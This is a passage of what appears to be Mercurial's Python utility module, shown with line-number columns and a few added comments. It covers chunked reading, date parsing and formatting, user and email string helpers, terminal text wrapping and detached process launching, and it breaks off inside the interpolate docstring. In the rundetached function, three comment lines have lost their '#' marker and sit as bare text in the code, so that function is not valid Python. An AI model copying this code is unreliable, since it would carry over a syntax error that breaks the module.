1801 1803 def read(self, l=None):
1802 1804 """Read L bytes of data from the iterator of chunks of data.
1803 1805 Returns less than L bytes if the iterator runs dry.
1804 1806
1805 1807 If size parameter is omitted, read everything"""
1806 1808 if l is None:
1807 1809 return ''.join(self.iter)
1808 1810
1809 1811 left = l
1810 1812 buf = []
1811 1813 queue = self._queue
1812 1814 while left > 0:
1813 1815 # refill the queue
1814 1816 if not queue:
1815 1817 target = 2**18
1816 1818 for chunk in self.iter:
1817 1819 queue.append(chunk)
1818 1820 target -= len(chunk)
1819 1821 if target <= 0:
1820 1822 break
1821 1823 if not queue:
1822 1824 break
1823 1825
1824 1826 # The easy way to do this would be to queue.popleft(), modify the
1825 1827 # chunk (if necessary), then queue.appendleft(). However, for cases
1826 1828 # where we read partial chunk content, this incurs 2 dequeue
1827 1829 # mutations and creates a new str for the remaining chunk in the
1828 1830 # queue. Our code below avoids this overhead.
1829 1831
1830 1832 chunk = queue[0]
1831 1833 chunkl = len(chunk)
1832 1834 offset = self._chunkoffset
1833 1835
1834 1836 # Use full chunk.
1835 1837 if offset == 0 and left >= chunkl:
1836 1838 left -= chunkl
1837 1839 queue.popleft()
1838 1840 buf.append(chunk)
1839 1841 # self._chunkoffset remains at 0.
1840 1842 continue
1841 1843
1842 1844 chunkremaining = chunkl - offset
1843 1845
1844 1846 # Use all of the unconsumed part of the chunk.
1845 1847 if left >= chunkremaining:
1846 1848 left -= chunkremaining
1847 1849 queue.popleft()
1848 1850 # offset == 0 is handled by the block above, so this won't merely
1849 1851 # copy via ``chunk[0:]``.
1850 1852 buf.append(chunk[offset:])
1851 1853 self._chunkoffset = 0
1852 1854
1853 1855 # Partial chunk needed.
1854 1856 else:
1855 1857 buf.append(chunk[offset:offset + left])
1856 1858 self._chunkoffset += left
1857 1859 left -= chunkremaining
1858 1860
1859 1861 return ''.join(buf)
1860 1862
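# A small illustration of the rechunking behavior (hypothetical chunks):
#
#   cb = chunkbuffer(iter(['abc', 'defg']))
#   cb.read(3)   # -> 'abc', the first chunk is consumed whole
#   cb.read(10)  # -> 'defg', fewer bytes because the iterator runs dry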
1861 1863 def filechunkiter(f, size=131072, limit=None):
1862 1864 """Create a generator that produces the data in the file size
1863 1865 (default 131072) bytes at a time, up to optional limit (default is
1864 1866 to read all data). Chunks may be less than size bytes if the
1865 1867 chunk is the last chunk in the file, or the file is a socket or
1866 1868 some other type of file that sometimes reads less data than is
1867 1869 requested."""
1868 1870 assert size >= 0
1869 1871 assert limit is None or limit >= 0
1870 1872 while True:
1871 1873 if limit is None:
1872 1874 nbytes = size
1873 1875 else:
1874 1876 nbytes = min(limit, size)
1875 1877 s = nbytes and f.read(nbytes)
1876 1878 if not s:
1877 1879 break
1878 1880 if limit:
1879 1881 limit -= len(s)
1880 1882 yield s
1881 1883
1882 1884 def makedate(timestamp=None):
1883 1885 '''Return a unix timestamp (or the current time) as a (unixtime,
1884 1886 offset) tuple based off the local timezone.'''
1885 1887 if timestamp is None:
1886 1888 timestamp = time.time()
1887 1889 if timestamp < 0:
1888 1890 hint = _("check your clock")
1889 1891 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1890 1892 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1891 1893 datetime.datetime.fromtimestamp(timestamp))
1892 1894 tz = delta.days * 86400 + delta.seconds
1893 1895 return timestamp, tz
1894 1896
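# A small illustration (assuming, hypothetically, a UTC+9 local zone;
# zones east of UTC yield negative offsets in this convention):
#
#   makedate(0)  # -> (0, -32400)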
1895 1897 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1896 1898 """represent a (unixtime, offset) tuple as a localized time.
1897 1899 unixtime is seconds since the epoch, and offset is the time zone's
1898 1900 number of seconds away from UTC.
1899 1901
1900 1902 >>> datestr((0, 0))
1901 1903 'Thu Jan 01 00:00:00 1970 +0000'
1902 1904 >>> datestr((42, 0))
1903 1905 'Thu Jan 01 00:00:42 1970 +0000'
1904 1906 >>> datestr((-42, 0))
1905 1907 'Wed Dec 31 23:59:18 1969 +0000'
1906 1908 >>> datestr((0x7fffffff, 0))
1907 1909 'Tue Jan 19 03:14:07 2038 +0000'
1908 1910 >>> datestr((-0x80000000, 0))
1909 1911 'Fri Dec 13 20:45:52 1901 +0000'
1910 1912 """
1911 1913 t, tz = date or makedate()
1912 1914 if "%1" in format or "%2" in format or "%z" in format:
1913 1915 sign = (tz > 0) and "-" or "+"
1914 1916 minutes = abs(tz) // 60
1915 1917 q, r = divmod(minutes, 60)
1916 1918 format = format.replace("%z", "%1%2")
1917 1919 format = format.replace("%1", "%c%02d" % (sign, q))
1918 1920 format = format.replace("%2", "%02d" % r)
1919 1921 d = t - tz
1920 1922 if d > 0x7fffffff:
1921 1923 d = 0x7fffffff
1922 1924 elif d < -0x80000000:
1923 1925 d = -0x80000000
1924 1926 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1925 1927 # because they use the gmtime() system call which is buggy on Windows
1926 1928 # for negative values.
1927 1929 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1928 1930 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1929 1931 return s
1930 1932
1931 1933 def shortdate(date=None):
1932 1934 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1933 1935 return datestr(date, format='%Y-%m-%d')
1934 1936
1935 1937 def parsetimezone(s):
1936 1938 """find a trailing timezone, if any, in string, and return a
1937 1939 (offset, remainder) pair"""
1938 1940
1939 1941 if s.endswith("GMT") or s.endswith("UTC"):
1940 1942 return 0, s[:-3].rstrip()
1941 1943
1942 1944 # Unix-style timezones [+-]hhmm
1943 1945 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1944 1946 sign = (s[-5] == "+") and 1 or -1
1945 1947 hours = int(s[-4:-2])
1946 1948 minutes = int(s[-2:])
1947 1949 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1948 1950
1949 1951 # ISO8601 trailing Z
1950 1952 if s.endswith("Z") and s[-2:-1].isdigit():
1951 1953 return 0, s[:-1]
1952 1954
1953 1955 # ISO8601-style [+-]hh:mm
1954 1956 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1955 1957 s[-5:-3].isdigit() and s[-2:].isdigit()):
1956 1958 sign = (s[-6] == "+") and 1 or -1
1957 1959 hours = int(s[-5:-3])
1958 1960 minutes = int(s[-2:])
1959 1961 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1960 1962
1961 1963 return None, s
1962 1964
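# Illustrative results (offsets east of UTC are negative):
#
#   parsetimezone('2006-02-01 13:00 +0900')  # -> (-32400, '2006-02-01 13:00')
#   parsetimezone('13:00 GMT')               # -> (0, '13:00')
#   parsetimezone('no timezone')             # -> (None, 'no timezone')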
1963 1965 def strdate(string, format, defaults=None):
1964 1966 """parse a localized time string and return a (unixtime, offset) tuple.
1965 1967 if the string cannot be parsed, ValueError is raised."""
1966 1968 if defaults is None:
1967 1969 defaults = {}
1968 1970
1969 1971 # NOTE: unixtime = localunixtime + offset
1970 1972 offset, date = parsetimezone(string)
1971 1973
1972 1974 # add missing elements from defaults
1973 1975 usenow = False # default to using biased defaults
1974 1976 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1975 1977 part = pycompat.bytestr(part)
1976 1978 found = [True for p in part if ("%"+p) in format]
1977 1979 if not found:
1978 1980 date += "@" + defaults[part][usenow]
1979 1981 format += "@%" + part[0]
1980 1982 else:
1981 1983 # We've found a specific time element, less specific time
1982 1984 # elements are relative to today
1983 1985 usenow = True
1984 1986
1985 1987 timetuple = time.strptime(encoding.strfromlocal(date),
1986 1988 encoding.strfromlocal(format))
1987 1989 localunixtime = int(calendar.timegm(timetuple))
1988 1990 if offset is None:
1989 1991 # local timezone
1990 1992 unixtime = int(time.mktime(timetuple))
1991 1993 offset = unixtime - localunixtime
1992 1994 else:
1993 1995 unixtime = localunixtime + offset
1994 1996 return unixtime, offset
1995 1997
1996 1998 def parsedate(date, formats=None, bias=None):
1997 1999 """parse a localized date/time and return a (unixtime, offset) tuple.
1998 2000
1999 2001 The date may be a "unixtime offset" string or in one of the specified
2000 2002 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2001 2003
2002 2004 >>> parsedate(' today ') == parsedate(\
2003 2005 datetime.date.today().strftime('%b %d'))
2004 2006 True
2005 2007 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
2006 2008 datetime.timedelta(days=1)\
2007 2009 ).strftime('%b %d'))
2008 2010 True
2009 2011 >>> now, tz = makedate()
2010 2012 >>> strnow, strtz = parsedate('now')
2011 2013 >>> (strnow - now) < 1
2012 2014 True
2013 2015 >>> tz == strtz
2014 2016 True
2015 2017 """
2016 2018 if bias is None:
2017 2019 bias = {}
2018 2020 if not date:
2019 2021 return 0, 0
2020 2022 if isinstance(date, tuple) and len(date) == 2:
2021 2023 return date
2022 2024 if not formats:
2023 2025 formats = defaultdateformats
2024 2026 date = date.strip()
2025 2027
2026 2028 if date == 'now' or date == _('now'):
2027 2029 return makedate()
2028 2030 if date == 'today' or date == _('today'):
2029 2031 date = datetime.date.today().strftime('%b %d')
2030 2032 elif date == 'yesterday' or date == _('yesterday'):
2031 2033 date = (datetime.date.today() -
2032 2034 datetime.timedelta(days=1)).strftime('%b %d')
2033 2035
2034 2036 try:
2035 2037 when, offset = map(int, date.split(' '))
2036 2038 except ValueError:
2037 2039 # fill out defaults
2038 2040 now = makedate()
2039 2041 defaults = {}
2040 2042 for part in ("d", "mb", "yY", "HI", "M", "S"):
2041 2043 # this piece is for rounding the specific end of unknowns
2042 2044 b = bias.get(part)
2043 2045 if b is None:
2044 2046 if part[0:1] in "HMS":
2045 2047 b = "00"
2046 2048 else:
2047 2049 b = "0"
2048 2050
2049 2051 # this piece is for matching the generic end to today's date
2050 2052 n = datestr(now, "%" + part[0:1])
2051 2053
2052 2054 defaults[part] = (b, n)
2053 2055
2054 2056 for format in formats:
2055 2057 try:
2056 2058 when, offset = strdate(date, format, defaults)
2057 2059 except (ValueError, OverflowError):
2058 2060 pass
2059 2061 else:
2060 2062 break
2061 2063 else:
2062 2064 raise error.ParseError(_('invalid date: %r') % date)
2063 2065 # validate explicit (probably user-specified) date and
2064 2066 # time zone offset. values must fit in signed 32 bits for
2065 2067 # current 32-bit linux runtimes. timezones go from UTC-12
2066 2068 # to UTC+14
2067 2069 if when < -0x80000000 or when > 0x7fffffff:
2068 2070 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2069 2071 if offset < -50400 or offset > 43200:
2070 2072 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2071 2073 return when, offset
2072 2074
2073 2075 def matchdate(date):
2074 2076 """Return a function that matches a given date match specifier
2075 2077
2076 2078 Formats include:
2077 2079
2078 2080 '{date}' match a given date to the accuracy provided
2079 2081
2080 2082 '<{date}' on or before a given date
2081 2083
2082 2084 '>{date}' on or after a given date
2083 2085
2084 2086 >>> p1 = parsedate("10:29:59")
2085 2087 >>> p2 = parsedate("10:30:00")
2086 2088 >>> p3 = parsedate("10:30:59")
2087 2089 >>> p4 = parsedate("10:31:00")
2088 2090 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2089 2091 >>> f = matchdate("10:30")
2090 2092 >>> f(p1[0])
2091 2093 False
2092 2094 >>> f(p2[0])
2093 2095 True
2094 2096 >>> f(p3[0])
2095 2097 True
2096 2098 >>> f(p4[0])
2097 2099 False
2098 2100 >>> f(p5[0])
2099 2101 False
2100 2102 """
2101 2103
2102 2104 def lower(date):
2103 2105 d = {'mb': "1", 'd': "1"}
2104 2106 return parsedate(date, extendeddateformats, d)[0]
2105 2107
2106 2108 def upper(date):
2107 2109 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2108 2110 for days in ("31", "30", "29"):
2109 2111 try:
2110 2112 d["d"] = days
2111 2113 return parsedate(date, extendeddateformats, d)[0]
2112 2114 except Abort:
2113 2115 pass
2114 2116 d["d"] = "28"
2115 2117 return parsedate(date, extendeddateformats, d)[0]
2116 2118
2117 2119 date = date.strip()
2118 2120
2119 2121 if not date:
2120 2122 raise Abort(_("dates cannot consist entirely of whitespace"))
2121 2123 elif date[0] == "<":
2122 2124 if not date[1:]:
2123 2125 raise Abort(_("invalid day spec, use '<DATE'"))
2124 2126 when = upper(date[1:])
2125 2127 return lambda x: x <= when
2126 2128 elif date[0] == ">":
2127 2129 if not date[1:]:
2128 2130 raise Abort(_("invalid day spec, use '>DATE'"))
2129 2131 when = lower(date[1:])
2130 2132 return lambda x: x >= when
2131 2133 elif date[0] == "-":
2132 2134 try:
2133 2135 days = int(date[1:])
2134 2136 except ValueError:
2135 2137 raise Abort(_("invalid day spec: %s") % date[1:])
2136 2138 if days < 0:
2137 2139 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2138 2140 % date[1:])
2139 2141 when = makedate()[0] - days * 3600 * 24
2140 2142 return lambda x: x >= when
2141 2143 elif " to " in date:
2142 2144 a, b = date.split(" to ")
2143 2145 start, stop = lower(a), upper(b)
2144 2146 return lambda x: x >= start and x <= stop
2145 2147 else:
2146 2148 start, stop = lower(date), upper(date)
2147 2149 return lambda x: x >= start and x <= stop
2148 2150
2149 2151 def stringmatcher(pattern, casesensitive=True):
2150 2152 """
2151 2153 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2152 2154 returns the matcher name, pattern, and matcher function.
2153 2155 missing or unknown prefixes are treated as literal matches.
2154 2156
2155 2157 helper for tests:
2156 2158 >>> def test(pattern, *tests):
2157 2159 ... kind, pattern, matcher = stringmatcher(pattern)
2158 2160 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2159 2161 >>> def itest(pattern, *tests):
2160 2162 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2161 2163 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2162 2164
2163 2165 exact matching (no prefix):
2164 2166 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2165 2167 ('literal', 'abcdefg', [False, False, True])
2166 2168
2167 2169 regex matching ('re:' prefix)
2168 2170 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2169 2171 ('re', 'a.+b', [False, False, True])
2170 2172
2171 2173 force exact matches ('literal:' prefix)
2172 2174 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2173 2175 ('literal', 're:foobar', [False, True])
2174 2176
2175 2177 unknown prefixes are ignored and treated as literals
2176 2178 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2177 2179 ('literal', 'foo:bar', [False, False, True])
2178 2180
2179 2181 case insensitive regex matches
2180 2182 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2181 2183 ('re', 'A.+b', [False, False, True])
2182 2184
2183 2185 case insensitive literal matches
2184 2186 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2185 2187 ('literal', 'ABCDEFG', [False, False, True])
2186 2188 """
2187 2189 if pattern.startswith('re:'):
2188 2190 pattern = pattern[3:]
2189 2191 try:
2190 2192 flags = 0
2191 2193 if not casesensitive:
2192 2194 flags = remod.I
2193 2195 regex = remod.compile(pattern, flags)
2194 2196 except remod.error as e:
2195 2197 raise error.ParseError(_('invalid regular expression: %s')
2196 2198 % e)
2197 2199 return 're', pattern, regex.search
2198 2200 elif pattern.startswith('literal:'):
2199 2201 pattern = pattern[8:]
2200 2202
2201 2203 match = pattern.__eq__
2202 2204
2203 2205 if not casesensitive:
2204 2206 ipat = encoding.lower(pattern)
2205 2207 match = lambda s: ipat == encoding.lower(s)
2206 2208 return 'literal', pattern, match
2207 2209
2208 2210 def shortuser(user):
2209 2211 """Return a short representation of a user name or email address."""
2210 2212 f = user.find('@')
2211 2213 if f >= 0:
2212 2214 user = user[:f]
2213 2215 f = user.find('<')
2214 2216 if f >= 0:
2215 2217 user = user[f + 1:]
2216 2218 f = user.find(' ')
2217 2219 if f >= 0:
2218 2220 user = user[:f]
2219 2221 f = user.find('.')
2220 2222 if f >= 0:
2221 2223 user = user[:f]
2222 2224 return user
2223 2225
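# For example (illustrative):
#
#   shortuser('John Doe <john.doe@example.com>')  # -> 'john'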
2224 2226 def emailuser(user):
2225 2227 """Return the user portion of an email address."""
2226 2228 f = user.find('@')
2227 2229 if f >= 0:
2228 2230 user = user[:f]
2229 2231 f = user.find('<')
2230 2232 if f >= 0:
2231 2233 user = user[f + 1:]
2232 2234 return user
2233 2235
2234 2236 def email(author):
2235 2237 '''get email of author.'''
2236 2238 r = author.find('>')
2237 2239 if r == -1:
2238 2240 r = None
2239 2241 return author[author.find('<') + 1:r]
2240 2242
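# For example (illustrative):
#
#   email('John Doe <john.doe@example.com>')  # -> 'john.doe@example.com'
#   email('john.doe@example.com')             # -> 'john.doe@example.com'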
2241 2243 def ellipsis(text, maxlength=400):
2242 2244 """Trim string to at most maxlength (default: 400) columns in display."""
2243 2245 return encoding.trim(text, maxlength, ellipsis='...')
2244 2246
2245 2247 def unitcountfn(*unittable):
2246 2248 '''return a function that renders a readable count of some quantity'''
2247 2249
2248 2250 def go(count):
2249 2251 for multiplier, divisor, format in unittable:
2250 2252 if abs(count) >= divisor * multiplier:
2251 2253 return format % (count / float(divisor))
2252 2254 return unittable[-1][2] % count
2253 2255
2254 2256 return go
2255 2257
2256 2258 def processlinerange(fromline, toline):
2257 2259 """Check that linerange <fromline>:<toline> makes sense and return a
2258 2260 0-based range.
2259 2261
2260 2262 >>> processlinerange(10, 20)
2261 2263 (9, 20)
2262 2264 >>> processlinerange(2, 1)
2263 2265 Traceback (most recent call last):
2264 2266 ...
2265 2267 ParseError: line range must be positive
2266 2268 >>> processlinerange(0, 5)
2267 2269 Traceback (most recent call last):
2268 2270 ...
2269 2271 ParseError: fromline must be strictly positive
2270 2272 """
2271 2273 if toline - fromline < 0:
2272 2274 raise error.ParseError(_("line range must be positive"))
2273 2275 if fromline < 1:
2274 2276 raise error.ParseError(_("fromline must be strictly positive"))
2275 2277 return fromline - 1, toline
2276 2278
2277 2279 bytecount = unitcountfn(
2278 2280 (100, 1 << 30, _('%.0f GB')),
2279 2281 (10, 1 << 30, _('%.1f GB')),
2280 2282 (1, 1 << 30, _('%.2f GB')),
2281 2283 (100, 1 << 20, _('%.0f MB')),
2282 2284 (10, 1 << 20, _('%.1f MB')),
2283 2285 (1, 1 << 20, _('%.2f MB')),
2284 2286 (100, 1 << 10, _('%.0f KB')),
2285 2287 (10, 1 << 10, _('%.1f KB')),
2286 2288 (1, 1 << 10, _('%.2f KB')),
2287 2289 (1, 1, _('%.0f bytes')),
2288 2290 )
2289 2291
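# For example (illustrative):
#
#   bytecount(1 << 20)  # -> '1.00 MB'
#   bytecount(123)      # -> '123 bytes'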
2290 2292 # Matches a single EOL which can either be a CRLF where repeated CR
2291 2293 # are removed or a LF. We do not care about old Macintosh files, so a
2292 2294 # stray CR is an error.
2293 2295 _eolre = remod.compile(br'\r*\n')
2294 2296
2295 2297 def tolf(s):
2296 2298 return _eolre.sub('\n', s)
2297 2299
2298 2300 def tocrlf(s):
2299 2301 return _eolre.sub('\r\n', s)
2300 2302
2301 2303 if pycompat.oslinesep == '\r\n':
2302 2304 tonativeeol = tocrlf
2303 2305 fromnativeeol = tolf
2304 2306 else:
2305 2307 tonativeeol = pycompat.identity
2306 2308 fromnativeeol = pycompat.identity
2307 2309
2308 2310 def escapestr(s):
2309 2311 # call underlying function of s.encode('string_escape') directly for
2310 2312 # Python 3 compatibility
2311 2313 return codecs.escape_encode(s)[0]
2312 2314
2313 2315 def unescapestr(s):
2314 2316 return codecs.escape_decode(s)[0]
2315 2317
2316 2318 def forcebytestr(obj):
2317 2319 """Portably format an arbitrary object (e.g. exception) into a byte
2318 2320 string."""
2319 2321 try:
2320 2322 return pycompat.bytestr(obj)
2321 2323 except UnicodeEncodeError:
2322 2324 # non-ascii string, may be lossy
2323 2325 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2324 2326
2325 2327 def uirepr(s):
2326 2328 # Avoid double backslash in Windows path repr()
2327 2329 return repr(s).replace('\\\\', '\\')
2328 2330
2329 2331 # delay import of textwrap
2330 2332 def MBTextWrapper(**kwargs):
2331 2333 class tw(textwrap.TextWrapper):
2332 2334 """
2333 2335 Extend TextWrapper for width-awareness.
2334 2336
2335 2337 Neither the number of 'bytes' in any encoding nor the number of
2336 2338 'characters' is appropriate for calculating terminal columns.
2337 2339
2338 2340 The original TextWrapper implementation uses built-in 'len()'
2339 2341 directly, so it must be overridden to use per-character width.
2340 2342
2341 2343 In addition, characters classified as 'ambiguous' width are
2342 2344 treated as wide in East Asian locales, but as narrow elsewhere.
2343 2345
2344 2346 This requires a per-usage decision to determine their width.
2345 2347 """
2346 2348 def _cutdown(self, ucstr, space_left):
2347 2349 l = 0
2348 2350 colwidth = encoding.ucolwidth
2349 2351 for i in xrange(len(ucstr)):
2350 2352 l += colwidth(ucstr[i])
2351 2353 if space_left < l:
2352 2354 return (ucstr[:i], ucstr[i:])
2353 2355 return ucstr, ''
2354 2356
2355 2357 # overriding of base class
2356 2358 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2357 2359 space_left = max(width - cur_len, 1)
2358 2360
2359 2361 if self.break_long_words:
2360 2362 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2361 2363 cur_line.append(cut)
2362 2364 reversed_chunks[-1] = res
2363 2365 elif not cur_line:
2364 2366 cur_line.append(reversed_chunks.pop())
2365 2367
2366 2368 # this overriding code is imported from TextWrapper of Python 2.6
2367 2369 # to calculate columns of string by 'encoding.ucolwidth()'
2368 2370 def _wrap_chunks(self, chunks):
2369 2371 colwidth = encoding.ucolwidth
2370 2372
2371 2373 lines = []
2372 2374 if self.width <= 0:
2373 2375 raise ValueError("invalid width %r (must be > 0)" % self.width)
2374 2376
2375 2377 # Arrange in reverse order so items can be efficiently popped
2376 2378 # from a stack of chunks.
2377 2379 chunks.reverse()
2378 2380
2379 2381 while chunks:
2380 2382
2381 2383 # Start the list of chunks that will make up the current line.
2382 2384 # cur_len is just the length of all the chunks in cur_line.
2383 2385 cur_line = []
2384 2386 cur_len = 0
2385 2387
2386 2388 # Figure out which static string will prefix this line.
2387 2389 if lines:
2388 2390 indent = self.subsequent_indent
2389 2391 else:
2390 2392 indent = self.initial_indent
2391 2393
2392 2394 # Maximum width for this line.
2393 2395 width = self.width - len(indent)
2394 2396
2395 2397 # First chunk on line is whitespace -- drop it, unless this
2396 2398 # is the very beginning of the text (i.e. no lines started yet).
2397 2399 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2398 2400 del chunks[-1]
2399 2401
2400 2402 while chunks:
2401 2403 l = colwidth(chunks[-1])
2402 2404
2403 2405 # Can at least squeeze this chunk onto the current line.
2404 2406 if cur_len + l <= width:
2405 2407 cur_line.append(chunks.pop())
2406 2408 cur_len += l
2407 2409
2408 2410 # Nope, this line is full.
2409 2411 else:
2410 2412 break
2411 2413
2412 2414 # The current line is full, and the next chunk is too big to
2413 2415 # fit on *any* line (not just this one).
2414 2416 if chunks and colwidth(chunks[-1]) > width:
2415 2417 self._handle_long_word(chunks, cur_line, cur_len, width)
2416 2418
2417 2419 # If the last chunk on this line is all whitespace, drop it.
2418 2420 if (self.drop_whitespace and
2419 2421 cur_line and cur_line[-1].strip() == r''):
2420 2422 del cur_line[-1]
2421 2423
2422 2424 # Convert current line back to a string and store it in list
2423 2425 # of all lines (return value).
2424 2426 if cur_line:
2425 2427 lines.append(indent + r''.join(cur_line))
2426 2428
2427 2429 return lines
2428 2430
2429 2431 global MBTextWrapper
2430 2432 MBTextWrapper = tw
2431 2433 return tw(**kwargs)
2432 2434
2433 2435 def wrap(line, width, initindent='', hangindent=''):
2434 2436 maxindent = max(len(hangindent), len(initindent))
2435 2437 if width <= maxindent:
2436 2438 # adjust for weird terminal size
2437 2439 width = max(78, maxindent + 1)
2438 2440 line = line.decode(pycompat.sysstr(encoding.encoding),
2439 2441 pycompat.sysstr(encoding.encodingmode))
2440 2442 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2441 2443 pycompat.sysstr(encoding.encodingmode))
2442 2444 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2443 2445 pycompat.sysstr(encoding.encodingmode))
2444 2446 wrapper = MBTextWrapper(width=width,
2445 2447 initial_indent=initindent,
2446 2448 subsequent_indent=hangindent)
2447 2449 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2448 2450
2449 2451 if (pyplatform.python_implementation() == 'CPython' and
2450 2452 sys.version_info < (3, 0)):
2451 2453 # There is an issue in CPython that some IO methods do not handle EINTR
2452 2454 # correctly. The following table shows what CPython version (and functions)
2453 2455 # are affected (buggy: has the EINTR bug, okay: otherwise):
2454 2456 #
2455 2457 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2456 2458 # --------------------------------------------------
2457 2459 # fp.__iter__ | buggy | buggy | okay
2458 2460 # fp.read* | buggy | okay [1] | okay
2459 2461 #
2460 2462 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2461 2463 #
2462 2464 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2463 2465 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2464 2466 #
2465 2467 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2466 2468 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2467 2469 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2468 2470 # fp.__iter__ but not other fp.read* methods.
2469 2471 #
2470 2472 # On modern systems like Linux, the "read" syscall cannot be interrupted
2471 2473 # when reading "fast" files like on-disk files. So the EINTR issue only
2472 2474 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2473 2475 # files approximately as "fast" files and use the fast (unsafe) code path,
2474 2476 # to minimize the performance impact.
2475 2477 if sys.version_info >= (2, 7, 4):
2476 2478 # fp.readline deals with EINTR correctly, use it as a workaround.
2477 2479 def _safeiterfile(fp):
2478 2480 return iter(fp.readline, '')
2479 2481 else:
2480 2482 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2481 2483 # note: this may block longer than necessary because of bufsize.
2482 2484 def _safeiterfile(fp, bufsize=4096):
2483 2485 fd = fp.fileno()
2484 2486 line = ''
2485 2487 while True:
2486 2488 try:
2487 2489 buf = os.read(fd, bufsize)
2488 2490 except OSError as ex:
2489 2491 # os.read only raises EINTR before any data is read
2490 2492 if ex.errno == errno.EINTR:
2491 2493 continue
2492 2494 else:
2493 2495 raise
2494 2496 line += buf
2495 2497 if '\n' in buf:
2496 2498 splitted = line.splitlines(True)
2497 2499 line = ''
2498 2500 for l in splitted:
2499 2501 if l[-1] == '\n':
2500 2502 yield l
2501 2503 else:
2502 2504 line = l
2503 2505 if not buf:
2504 2506 break
2505 2507 if line:
2506 2508 yield line
2507 2509
2508 2510 def iterfile(fp):
2509 2511 fastpath = True
2510 2512 if type(fp) is file:
2511 2513 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2512 2514 if fastpath:
2513 2515 return fp
2514 2516 else:
2515 2517 return _safeiterfile(fp)
2516 2518 else:
2517 2519 # PyPy and CPython 3 do not have the EINTR issue, so no workaround is needed.
2518 2520 def iterfile(fp):
2519 2521 return fp
2520 2522
2521 2523 def iterlines(iterator):
2522 2524 for chunk in iterator:
2523 2525 for line in chunk.splitlines():
2524 2526 yield line
2525 2527
2526 2528 def expandpath(path):
2527 2529 return os.path.expanduser(os.path.expandvars(path))
2528 2530
2529 2531 def hgcmd():
2530 2532 """Return the command used to execute current hg
2531 2533
2532 2534 This is different from hgexecutable() because on Windows we want
2533 2535 to avoid things opening new shell windows like batch files, so we
2534 2536 get either the python call or current executable.
2535 2537 """
2536 2538 if mainfrozen():
2537 2539 if getattr(sys, 'frozen', None) == 'macosx_app':
2538 2540 # Env variable set by py2app
2539 2541 return [encoding.environ['EXECUTABLEPATH']]
2540 2542 else:
2541 2543 return [pycompat.sysexecutable]
2542 2544 return gethgcmd()
2543 2545
2544 2546 def rundetached(args, condfn):
2545 2547 """Execute the argument list in a detached process.
2546 2548
2547 2549 condfn is a callable which is called repeatedly and should return
2548 2550 True once the child process is known to have started successfully.
2549 2551 At this point, the child process PID is returned. If the child
2550 2552 process fails to start or finishes before condfn() evaluates to
2551 2553 True, return -1.
2552 2554 """
2553 2555 # Windows case is easier because the child process is either
2554 2556 # successfully starting and validating the condition or exiting
2555 2557 # on failure. We just poll on its PID. On Unix, if the child
2556 2558 # process fails to start, it will be left in a zombie state until
2557 2559 the parent waits on it, which we cannot do since we expect a
2558 2560 long-running process on success. Instead we listen for SIGCHLD
2559 2561 telling us our child process terminated.
2560 2562 terminated = set()
2561 2563 def handler(signum, frame):
2562 2564 terminated.add(os.wait())
2563 2565 prevhandler = None
2564 2566 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2565 2567 if SIGCHLD is not None:
2566 2568 prevhandler = signal.signal(SIGCHLD, handler)
2567 2569 try:
2568 2570 pid = spawndetached(args)
2569 2571 while not condfn():
2570 2572 if ((pid in terminated or not testpid(pid))
2571 2573 and not condfn()):
2572 2574 return -1
2573 2575 time.sleep(0.1)
2574 2576 return pid
2575 2577 finally:
2576 2578 if prevhandler is not None:
2577 2579 signal.signal(signal.SIGCHLD, prevhandler)
2578 2580
2579 2581 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2580 2582 """Return the result of interpolating items in the mapping into string s.
2581 2583
2582 2584 prefix is a single character string, or a two character string with
2583 2585 a backslash as the first character if the prefix needs to be escaped in
2584 2586 a regular expression.
2585 2587
2586 2588 fn is an optional function that will be applied to the replacement text
2587 2589 just before replacement.
2588 2590
2589 2591 escape_prefix is an optional flag that allows using doubled prefix for
2590 2592 its escaping.
